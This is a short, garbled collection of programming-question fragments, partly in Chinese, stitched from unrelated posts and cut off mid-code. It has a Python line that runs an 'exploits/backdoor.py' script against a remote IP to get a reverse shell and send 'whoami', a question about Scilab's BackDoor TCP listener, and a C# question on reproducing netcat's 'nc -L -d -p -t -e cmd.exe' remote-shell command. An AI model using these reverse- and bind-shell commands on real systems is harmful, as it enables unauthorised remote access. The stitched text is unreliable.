Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()backdoor.execute() //This method allow me to get a reverse shell
backdoor.send("whoami") //
我想从PHP运行带有BackDoor模块的scilab。()sudo scilab-adv-cliopening BackDoorBackDoor: listening to commands on TCP port当模块BackDoor没有安装时,结果是"\n\n",而不是“杀死”。当我运行永无止境时,进程将显示在终端中的命令"top“列表中,直到我杀死它为止。使用BackDoor模块,进程将只显示几秒钟,然后结束。在最后一个例子中,
我有兴趣写一个程序,它可以做一些类似netcats的"nc -L -d -p -t -e cmd.exe“命令。所以它提供了一个远程shell。我尝试过通过管道传输cmd.exe的输出和输入,并通过套接字发送和接收,但它似乎工作得并不是很好。有没有其他的方法呢?顺便说一下,我是用C#编程的。 Process p = new Pro